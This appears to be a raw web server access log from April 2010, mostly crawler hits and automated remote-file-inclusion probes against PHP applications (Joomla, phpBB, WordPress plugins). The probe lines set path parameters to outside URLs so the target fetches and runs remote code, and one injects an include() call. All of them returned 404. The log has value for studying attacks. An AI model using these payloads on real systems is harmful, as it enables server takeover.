222.236.47.182 - - [20/Apr/2010:14:11:06 -0500] "GET /logs/access_log.1271030400%20%20///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:11:06 -0500] "GET ///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:11:09 -0500] "GET /logs///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:11:12 -0500] "GET ///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:11:18 -0500] "GET /logs/access_log.1271030400%20%20///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:11:18 -0500] "GET /logs///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.168.155.50 - - [20/Apr/2010:14:11:38 -0500] "GET /logs/access_log.1219708800/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:11:47 -0500] "GET /logs/access_log.1165708800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [20/Apr/2010:14:12:36 -0500] "GET /ubbt.inc.php?GLOBALS[thispath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:12:36 -0500] "GET /logs/access_log.1262822400/ubbt.inc.php?GLOBALS[thispath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:12:36 -0500] "GET /logs/ubbt.inc.php?GLOBALS[thispath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:12:37 -0500] "GET /ubbt.inc.php?GLOBALS[thispath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:12:37 -0500] "GET /logs/ubbt.inc.php?GLOBALS[thispath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:12:37 -0500] "GET /logs/access_log.1262822400/ubbt.inc.php?GLOBALS[thispath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:12:42 -0500] "GET /logs/access_log.1225238400///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:12:47 -0500] "GET /logs/access_log.1251504000///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:12:48 -0500] "GET /logs/access_log.1251504000///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:12:48 -0500] "GET /logs/access_log.1225238400///index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:13:42 -0500] "GET /logs/access_log.1168214400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [20/Apr/2010:14:14:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [20/Apr/2010:14:16:15 -0500] "GET /logs/access_log.1184457600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [20/Apr/2010:14:18:13 -0500] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:18:13 -0500] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:18:13 -0500] "GET /logs/access_log.1212969600%20%20///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:18:49 -0500] "GET /logs/access_log.1256428800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [20/Apr/2010:14:18:57 -0500] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:18:57 -0500] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:14:18:57 -0500] "GET /logs/access_log.1212969600%20%20///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.startstudy.co.kr/home/image/center/title1.gif?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.13.139 - - [20/Apr/2010:14:20:34 -0500] "GET /logs/access_log.1227312000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:14:20:44 -0500] "GET /logs/access_log.1195603200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.25.141.101 - - [20/Apr/2010:14:21:25 -0500] "GET /ubbt.inc.php?GLOBALS[thispath]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:14:21:25 -0500] "GET /logs/ubbt.inc.php?GLOBALS[thispath]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:14:21:25 -0500] "GET /logs/access_log.1262822400/ubbt.inc.php?GLOBALS[thispath]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:14:21:30 -0500] "GET /ubbt.inc.php?GLOBALS[thispath]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:14:21:30 -0500] "GET /logs/ubbt.inc.php?GLOBALS[thispath]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.72.194.58 - - [20/Apr/2010:14:21:30 -0500] "GET /logs/access_log.1262822400/ubbt.inc.php?GLOBALS[thispath]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:23:17 -0500] "GET /logs/access_log.1197331200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [20/Apr/2010:14:23:27 -0500] "GET /advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:23:27 -0500] "GET /logs/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:23:27 -0500] "GET /logs/access_log.1263859200/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:23:27 -0500] "GET /logs/access_log.1251504000/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.195.223 - - [20/Apr/2010:14:23:28 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.50.85.15 - - [20/Apr/2010:14:23:29 -0500] "GET /advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:23:29 -0500] "GET /logs/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:23:29 -0500] "GET /logs/access_log.1251504000/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:23:29 -0500] "GET /logs/access_log.1263859200/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:01 -0500] "GET /logs/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:01 -0500] "GET /advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:10 -0500] "GET /logs/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:10 -0500] "GET /advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:10 -0500] "GET /logs/access_log.1263945600/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:10 -0500] "GET /logs/access_log.1244592000/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:14 -0500] "GET /logs/access_log.1238803200/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:21 -0500] "GET /logs/access_log.1263945600/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:21 -0500] "GET /logs/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:21 -0500] "GET /advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:21 -0500] "GET /logs/access_log.1244592000/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:55 -0500] "GET /advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:24:55 -0500] "GET /logs/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:25:07 -0500] "GET /logs/access_log.1238803200/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:25:14 -0500] "GET /logs/access_log.1161043200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:14:26:30 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:14:30:21 -0500] "GET /logs/access_log.1185667200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [20/Apr/2010:14:31:26 -0500] "GET /agenda2.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:31:26 -0500] "GET /logs/agenda2.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:31:26 -0500] "GET /logs/access_log.1262822400/agenda2.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:31:29 -0500] "GET /agenda2.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:31:29 -0500] "GET /logs/agenda2.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:31:29 -0500] "GET /logs/access_log.1262822400/agenda2.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:31:38 -0500] "GET /logs/access_log.1160179200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
163.24.136.10 - - [20/Apr/2010:14:33:07 -0500] "GET /logs/access_log.1212969600/send_reminders.php?includedir=http://www.cerep.co.kr/ver1//ajim1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:33:33 -0500] "GET /logs/access_log.1193184000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [20/Apr/2010:14:34:04 -0500] "GET ///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:34:04 -0500] "GET /logs/access_log.1219708800%20%20///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:34:04 -0500] "GET /logs///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:34:44 -0500] "GET /logs/access_log.1219708800%20%20///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:34:44 -0500] "GET ///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:34:44 -0500] "GET /logs///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.199.43 - - [20/Apr/2010:14:35:27 -0500] "GET /logs/access_log.1260403200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:14:35:28 -0500] "GET /logs/access_log.1191888000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.46.42.233 - - [20/Apr/2010:14:35:35 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.f1h2o.com/.logs?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
163.24.136.10 - - [20/Apr/2010:14:35:44 -0500] "GET /logs/access_log.1212969600/send_reminders.php?includedir=http://www.cerep.co.kr/ver1//ajim1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:36:03 -0500] "GET /Packages.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:36:03 -0500] "GET /logs/Packages.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:36:03 -0500] "GET /logs/access_log.1262476800/Packages.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:36:06 -0500] "GET /Packages.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:36:06 -0500] "GET /logs/Packages.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:36:06 -0500] "GET /logs/access_log.1262476800/Packages.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:36:45 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:14:38:04 -0500] "GET /logs/access_log.1192233600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:14:39:48 -0500] "GET /logs/access_log.1265241600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:14:39:59 -0500] "GET /logs/access_log.1246665600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:14:41:36 -0500] "GET /logs//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:14:41:36 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:14:41:36 -0500] "GET //SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:41:54 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [20/Apr/2010:14:42:45 -0500] "GET /logs/access_log.1219708800///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:14:42:58 -0500] "GET /logs//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:14:42:58 -0500] "GET //SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:14:42:58 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:43:08 -0500] "GET /logs/access_log.1212969600///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:43:48 -0500] "GET /logs/access_log.1219708800///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:14:44:15 -0500] "GET /logs/access_log.1212969600///modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:44:28 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:14:46:23 -0500] "GET /logs/access_log.1210636800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:14:48:56 -0500] "GET /logs/access_log.1156636800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:14:50:13 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:14:51:15 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:14:52:08 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:14:52:18 -0500] "GET /logs/access_log.1265760000//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:14:53:34 -0500] "GET /logs/access_log.1265760000//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:54:03 -0500] "GET /logs/access_log.1215648000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [20/Apr/2010:14:55:08 -0500] "GET /rsgallery.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:55:08 -0500] "GET /logs/access_log.1270684800%20%20/rsgallery.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:55:08 -0500] "GET /logs/rsgallery.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:55:11 -0500] "GET /rsgallery.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:55:11 -0500] "GET /logs/rsgallery.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:55:11 -0500] "GET /logs/access_log.1270684800%20%20/rsgallery.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:55:58 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [20/Apr/2010:14:57:24 -0500] "GET /index.php?basepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:57:24 -0500] "GET /logs/index.php?basepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:57:24 -0500] "GET /logs/access_log.1220054400%20%20/index.php?basepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:57:31 -0500] "GET /logs/index.php?basepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:57:31 -0500] "GET /logs/access_log.1220054400%20%20/index.php?basepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.50.85.15 - - [20/Apr/2010:14:57:31 -0500] "GET /index.php?basepath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:14:57:54 -0500] "GET /logs/access_log.1195776000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:15:00:27 -0500] "GET /logs/access_log.1189555200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.176.226.170 - - [20/Apr/2010:15:01:38 -0500] "GET /logs/access_log.1266710400/site//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:15:01:38 -0500] "GET /logs/site//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:15:01:38 -0500] "GET /site//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:15:02:22 -0500] "GET /logs/access_log.1268956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.198.53.118 - - [20/Apr/2010:15:03:02 -0500] "GET /logs//modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
213.198.53.118 - - [20/Apr/2010:15:03:02 -0500] "GET //modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
74.126.30.162 - - [20/Apr/2010:15:03:30 -0500] "GET /logs//modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
74.126.30.162 - - [20/Apr/2010:15:03:30 -0500] "GET //modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.250.255.243 - - [20/Apr/2010:15:03:39 -0500] "GET /logs/access_log.1183766400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.26.54.19 - - [20/Apr/2010:15:04:04 -0500] "GET /logs//modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 328 "-""libwww-perl/5.825"
217.26.54.19 - - [20/Apr/2010:15:04:04 -0500] "GET //modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.825"
87.250.255.243 - - [20/Apr/2010:15:06:12 -0500] "GET /logs/access_log.1173830400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.198.53.118 - - [20/Apr/2010:15:07:04 -0500] "GET /logs//modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
213.198.53.118 - - [20/Apr/2010:15:07:04 -0500] "GET //modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
